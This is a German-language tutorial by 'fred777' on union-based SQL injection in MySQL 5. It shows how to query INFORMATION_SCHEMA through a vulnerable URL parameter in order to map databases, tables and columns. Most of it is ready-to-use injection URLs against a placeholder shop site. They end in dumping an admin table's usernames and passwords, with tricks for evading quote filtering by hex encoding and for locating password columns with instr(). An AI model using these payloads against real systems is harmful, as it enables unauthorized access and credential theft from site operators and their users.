*******************************************************
# WEBSECURITY DOCUMENTATION #
# -------------------------------------- #
# SQL Injection with INFORMATION_SCHEMA #
# -------------------------------------- #
# #
# #
# [+] written by fred777 [fred777.de] #
# #
******************************************************
--[0x00]-- Intro
--[0x01]-- Knowledge
[1] Struktur
--[0x02]-- Exploiting
[1] Information_schema etc.
[2] Crawling
--[0x03]-- Tipps & Tricks
[1] Where - Bedingung
[2] Instr() - Bedingung
--[0x04]-- Finito
******************************************************
######################################################
--[ 0x00 ]-- Intro:
Willkommen zu meinem Paper über SQL Injections mit mySQL 5.
Alle Standards solltet ihr aus anderen oder meinem ersten Tutorial bereits kennen.
Folglich werde ich auch nicht auf alle Begriffe ausführlich eingehen...
####################################################
--[ 0x01 ]-- Knowledge
-------------------------------------------------------
[1] Struktur
-------------------------------------------------------
Ein bedeutender Unterschied von Version 4 zu Version 5 ist die information_schema.
Eine Datenbank, welche Zugriff auf Metadaten der eigentlichen Datenbanken bietet.
Folglich sind die Namen, Statistiken und Datentypen über Tables, Columns und andere
Datenbanken vorhanden. Es gibt viele Tables der information_schema wie etwa:
INFORMATION_SCHEMA SCHEMATA
INFORMATION_SCHEMA TABLES
INFORMATION_SCHEMA COLUMNS
INFORMATION_SCHEMA STATISTICS
INFORMATION_SCHEMA USER_PRIVILEGES
INFORMATION_SCHEMA SCHEMA_PRIVILEGES
INFORMATION_SCHEMA TABLE_PRIVILEGES
INFORMATION_SCHEMA COLUMN_PRIVILEGES
INFORMATION_SCHEMA CHARACTER_SETS
INFORMATION_SCHEMA COLLATIONS
Ich könnte natürlich jetzt auf jede einzelne Table eingehen, doch ich belasse es mal bei den
für uns wichtigsten für uns. Das wären:
INFORMATION_SCHEMA SCHEMATA
INFORMATION_SCHEMA TABLES
INFORMATION_SCHEMA COLUMNS
INFORMATION_SCHEMA SCHEMATA > bietet uns Informationen über die vorhandenen Datenbanken an.
Sie besitzt folgende Columns:
CATALOG_NAME
SCHEMA_NAME
DEFAULT_CHARACTER_SET_NAME
DEFAULT_COLLATION_NAME
SQL_PATH
Wirklich wichtig ist nur SCHEMA_NAME, welcher uns die Namen der Datenbanken liefert.
INFORMATION_SCHEMA TABLES > ja wer hätte das gedacht, gibt und Informationen über die
vorhandenen Tables, auch hier gibt es eine Menge Columns:
TABLE_CATALOG
TABLE_SCHEMA
TABLE_NAME
......
Wichtig für uns ist nur der Table_name, da wir somit ganz schnell die Usertable hätten..
INFORMATION_SCHEMA COLUMNS > gibt uns Informationen über die vorhandenen Columns.
Die wichtigen Spalten hier sind folgende:
TABLE_SCHEMA
TABLE_NAME
COLUMN_NAME
Wir kennen aus dem ersten Paper schon die Limit Funktion und können uns denken wie wir
die Metadatenbank durchsuchen können.
##########################################################
--[ 0x02 ]-- Exploiting
-------------------------------------------------------
[1] Information_schema etc.
-------------------------------------------------------
Jetzt testen wir das ganze mal an einem Beispiel. Wir haben eine Seite mit einem Query, welcher verwundbar ist,
eine Ausgabe hervorbringt und das ganze schon auf Version 5 gecheckt.
www.seite.de/index.php?id=777+union+select+1,2,version(),4-- f == Version 5.xxxxx
Nun würden wir gerne die Usertable abrufen, wissen aber nicht wie diese sich nennt, nach
unserem jetzigen Erkenntnisstand könne wir die information_schema fragen.
Also los:
www.seite.de/index.php?id=777+union+select+1,2,3,4+from+information_schema.columns-- f
Wie wir oben gesehen haben, birgt diese Table alle nötigen Informationen in sich.
Außerdem erscheint eine 3, also existiert die information_schema.columns
(Wir verbinden die Datenbank mit der Table duch einen Punkt, um darauf zuzugreifen)
Setzen wir also schonmal die entsprechenden Columns:
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns-- f
Es wird uns der erste Eintrag angezeigt:
information_schema:CHARACTER_SETS:CHARACTER_SET_NAME
Datenbank -------------------- Table --------------- Column
-------------------------------------------------------
[2] Crawling
-------------------------------------------------------
Jetzt wollen wir aber den Namen der Usertabelle finden und diese liegt sicher nicht in der
information_schema sondern in einer anderen Datenbank. Wir erinnern uns an LIMIT und setzen es dahinter
Unser Ziel ist es erstmal aus der information_schema herauszukommen, was meist um den 180. Eintrag passiert
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+limit+180,1-- f
eShopdatabase:News:Id
Datenbank --- Table -- Column
Aha, schon besser, wir befinden uns nun in der wahrscheinlich 2. Datenbank, also hinter INFORMATION_SCHEMA, also weiter..
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+limit+194,1-- f
eShopdatabase:eShopAdmins:Username
Datenbank --- Table -- Column
Wir sind fündig geworden und haben den Namen, jetzt wird um ein paar Stellen verschoben wohl auch
Password sitzen. Welches ihr einfach genauso suche müsst..
Nun starten wir wie gewohnt unsere Abfrage mit den nun gewonnenen Namen.
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,Username,Password),4+from+eShopAdmins-- f
Damit es keine Probleme mit anderen Datenbanken gibt, sagen wir dem Query noch aus welcher Datenbank eShopAdmins kommt
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,Username,Password),4+from+eShopdatabase.eShopAdmins-- f
###############################################################
--[ 0x03 ]-- Tipps & Tricks
-------------------------------------------------------
[1] WHERE - Bedingung
-------------------------------------------------------
So nun gibt es noch ein paar Vereinfachungen, welche es uns ermöglichen schneller eine gewisse Table zu finden.
Dazu stellen wir eine Art Bedingung auf mittels WHERE oder auch LIKE.
Vorhin sind wir durch die gesamte information_schema gewandert um dann bei ca. dem 190. Wert halt zu machen.
Sagen wird soch einfach, gib alle Columns und Tables aus, welche NICHT in der information_schema liegen, damit haben wir uns schon einiges
gespart. Den Befehl WHERE kenne wir schon.
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+where+table_schema!='information_Schema'-- f
Das Problem hier könnte werden, das ' gequoted werden, so wandeln wir das ganze einfach in hex um.
information_schema == 0x696E666F726D6174696F6E5F736368656D61
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+where+table_schema!=0x696E666F726D6174696F6E5F736368656D61-- f
So, oder wir machen es uns noch einfacher, und sagen: WHERE table_schema='eShopdatabase'-- f
Ein ähnlicher weg ist, die Abfrage mit database() zu machen, da diese sowieso immer die Datenbank des aktuellen
Querys enthält:
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+where+table_schema = database()-- f
-------------------------------------------------------
[2] Instr() - Bedingung
-------------------------------------------------------
Der zweite wichtige Befehl welcher uns schneller zum Ziel bringt ist instr(arg,word), er findet Zeichenkette.
Das machen wir uns zu nutze, da in der Usertable meisten die Column welche die Passwörter enthält mit 'pass' anfängt..
Also suchen wir die Database+Tablename+Columnname aus der "richige" Datenbank (database()) wenn columnname den String
pass enthält. Verknüpft wird das ganze mit and.
Also so:
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+where+table_schema=database()+and+instr(column_name,'pass')-- f
Auch hier können wir notfalls den Wert mit hex ersetzen, falls ' nicht erlaubt sind...
www.seite.de/index.php?id=777+union+select+1,2,concat_ws(0x3a,table_schema,table_name,column_name),4+from+information_schema.columns+where+table_schema=database()+and+instr(column_name,0x70617373)-- f
Der Vorteil durch instr(), wir müssen lange nicht 190 Werte durchgehen, sondern stoßen direkt auf die richtige
Table/Column.
##################################################################
--[0x04]-- Finito
Das wars auch schon wieder, ich hoffe es war lehrreich und schaut auch mal auf fred777.5x.to vorbei :)
Ein bisschen testen in der eigenen Datenbank kann auch nie schaden.